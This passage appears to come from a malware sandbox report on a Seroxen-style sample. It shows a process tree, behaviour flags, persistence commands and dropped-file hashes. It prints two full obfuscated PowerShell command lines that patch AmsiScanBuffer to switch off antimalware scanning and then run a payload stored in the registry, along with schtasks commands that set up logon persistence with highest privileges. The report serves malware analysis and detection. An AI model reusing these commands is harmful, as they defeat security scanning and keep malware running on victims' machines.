@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$SwSavzUwlNI=$raAYPElaBkkuD.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](77)+'o'+'d'+''+'u'+''+'l'+'eHa'+[Char](110)+''+[Char](100)+'le').Invoke($Null,@([Object]('k'+[Char](101)+'rn'+[Char](101)+''+'l'+''+'3'+''+[Char](50)+''+'.'+'d'+[Char](108)+''+[Char](108)+'')));$byWtraWecOaFvt=$lVEDeSlznqfxmD.Invoke($Null,@([Object]$SwSavzUwlNI,[Object]('L'+'o'+''+[Char](97)+''+'d'+'L'+[Char](105)+''+[Char](98)+''+'r'+'a'+[Char](114)+''+'y'+''+[Char](65)+'')));$uydOAFHoiHzeyfcLU=$lVEDeSlznqfxmD.Invoke($Null,@([Object]$SwSavzUwlNI,[Object]('V'+'i'+''+'r'+'t'+'u'+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+''+'o'+'t'+'e'+''+'c'+''+'t'+'')));$JupGxkl=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($byWtraWecOaFvt,$MvfMsTwrefgYjLyWoYV).Invoke(''+[Char](97)+''+[Char](109)+'s'+'i'+'.d'+'l'+''+[Char](108)+'');$EKymQkFiUAOEGebdW=$lVEDeSlznqfxmD.Invoke($Null,@([Object]$JupGxkl,[Object](''+[Char](65)+''+'m'+'s'+[Char](105)+''+[Char](83)+'canB'+[Char](117)+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$cTTZrVqztd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uydOAFHoiHzeyfcLU,$HwZQnwlxZCtiHFXAfjhpBV).Invoke($EKymQkFiUAOEGebdW,[uint32]8,4,[ref]$cTTZrVqztd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EKymQkFiUAOEGebdW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($uydOAFHoiHzeyfcLU,$HwZQnwlxZCtiHFXAfjhpBV).Invoke($EKymQkFiUAOEGebdW,[uint32]8,0x20,[ref]$cTTZrVqztd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+''+'W'+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+''+'7'+''+[Char](115)+''+[Char](116)+'ag'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:pUSaQiSGOuFK{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ijMkakVQJFvMRs,[Parameter(Position=1)][Type]$MAVKEdsCtw)$uOHCZQGmVQB=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+[Char](101)+'c'+[Char](116)+''+[Char](101)+''+'d'+''+'D'+'el'+[Char](101)+''+'g'+''+'a'+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+'yM'+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+'t'+'e'+[Char](84)+''+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+'s'+',Pu'+[Char](98)+''+[Char](108)+'i'+[Char](99)+','+[Char](83)+'e'+[Char](97)+''+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+'s'+'',[MulticastDelegate]);$uOHCZQGmVQB.DefineConstructor(''+'R'+'TS'+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+[Char](97)+''+[Char](108)+'Na'+[Char](109)+'e'+[Char](44)+'H'+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+'u'+'b'+'l'+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$ijMkakVQJFvMRs).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+'t'+''+'i'+'m'+'e'+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+'d');$uOHCZQGmVQB.DefineMethod(''+'I'+'n'+[Char](118)+''+'o'+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+'b'+'l'+'i'+''+'c'+''+','+'H'+[Char](105)+''+'d'+''+[Char](101)+'By'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'N'+'e'+''+'w'+'S'+'l'+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+'i'+'r'+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'',$MAVKEdsCtw,$ijMkakVQJFvMRs).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+'t'+''+[Char](105)+''+'m'+''+'e'+''+[Char](44)+'M'+'a'+''+[Char](110)+'ag'+[Char](101)+''+'d'+'');Write-Output $uOHCZQGmVQB.CreateType();}$DNRZRhPmiHQid=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+'s'+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+'d'+''+'l'+''+'l'+'')}).GetType('M'+'i'+'cr'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+'.'+'Wi'+[Char](110)+''+[Char](51)+'2.'+[Char](85)+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+''+'e'+''+'N'+'a'+'t'+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+'ho'+[Char](100)+''+'s'+'');$nwCofUcARRsoNF=$DNRZRhPmiHQid.GetMethod(''+'G'+''+[Char](101)+'tP'+'r'+''+[Char](111)+'cAd'+[Char](100)+'r'+'e'+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+'i'+[Char](99)+','+[Char](83)+''+[Char](116)+''+'a'+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JAmdtQdLdFsWdxZZvpm=pUSaQiSGOuFK @([String])([IntPtr]);$sEkyDoEbGXtkXZXgQdNGPK=pUSaQiSGOuFK @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MbAAdmtlKKt=$DNRZRhPmiHQid.GetMethod(''+'G'+'e'+[Char](116)+''+'M'+'o'+[Char](100)+'u'+'l'+''+[Char](101)+''+[Char](72)+''+'a'+''+'n'+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'ern'+[Char](101)+''+'l'+'3'+[Char](50)+'.'+'d'+''+[Char](108)+''+'l'+'')));$znChLIGnqlskyo=$nwCofUcARRsoNF.Invoke($Null,@([Object]$MbAAdmtlKKt,[Object]('L'+'o'+''+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+''+'b'+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+'A')));$YrfoTHOoILQyMgEOb=$nwCofUcARRsoNF.Invoke($Null,@([Object]$MbAAdmtlKKt,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+'t'+[Char](101)+'c'+[Char](116)+'')));$ImBdQmI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($znChLIGnqlskyo,$JAmdtQdLdFsWdxZZvpm).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$aSBEThjEkIESdEFGM=$nwCofUcARRsoNF.Invoke($Null,@([Object]$ImBdQmI,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+''+[Char](83)+''+'c'+'a'+[Char](110)+''+'B'+''+'u'+''+'f'+''+'f'+''+[Char](101)+''+[Char](114)+'')));$usjpOjiISt=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YrfoTHOoILQyMgEOb,$sEkyDoEbGXtkXZXgQdNGPK).Invoke($aSBEThjEkIESdEFGM,[uint32]8,4,[ref]$usjpOjiISt);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$aSBEThjEkIESdEFGM,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YrfoTHOoILQyMgEOb,$sEkyDoEbGXtkXZXgQdNGPK).Invoke($aSBEThjEkIESdEFGM,[uint32]8,0x20,[ref]$usjpOjiISt);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'TW'+'A'+''+'R'+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+'s'+''+'t'+'ag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2020 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:540
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1144
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1152
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1200
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1212
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1408
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
PID:2584
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1592
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1604
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1616
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1740
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1780
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1864
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1992
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2000
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1512
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1600
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2160
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2264
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2368
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2544
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2552
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2648
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2732
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2748
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2784
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2816
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2828
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2836
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3476
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:3520 -
C:\Users\Admin\AppData\Local\Temp\Uni.exe"C:\Users\Admin\AppData\Local\Temp\Uni.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3952 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Uni.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
PID:3204
-
-
C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3592 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
PID:3264
-
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"4⤵
- Executes dropped EXE
PID:2944
-
-
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"3⤵
- Executes dropped EXE
PID:2660
-
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Uni.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Uni.exe'" /sc onlogon /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4488
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3680
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3884
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:4044
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4128
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3740
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4368
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4576
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:5076
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1072
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4604
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:2440
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2976
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:768
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:112
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:5000
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:3280
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:3852
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
Filesize
409KB
MD57417c8c73e614f293152575f46134216
SHA1cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805
SHA25600c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3
SHA512897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187
Filesize412B
MD5544d935d8a771959fa6d0afeb1a1514f
SHA1901b12d5db14cfc13fd94155b4150a36f0a13313
SHA25609a292027c75b452ed7a917d9c2603b5c89138557c633a9f18239e3f3b139e20
SHA512152bd2a6e60f14ce5cdc9081ffa97ef6fcd65e22762bac55250dacf9972df3514eb56e86df4750178567e775db25d9b342078e88b71557672e6817ad26c3bb33
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
Filesize2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize435B
MD57d94cc4c650af238a51456db5feee0f0
SHA1f91d540a095b3c9c16d96c1ded90f01f9ae388aa
SHA256b0e0013c4b327c9d81798ed5d346dff9cf7ce8e2820c0392a0703469adaaa087
SHA5121604091938fa4d62756fca031af871d14b3cb0fdaaaa933812f2a3b23e25f218792c83646d770979368512d6d0cf3c4812fbc5bfa4ed8dda25348a3a2370c20e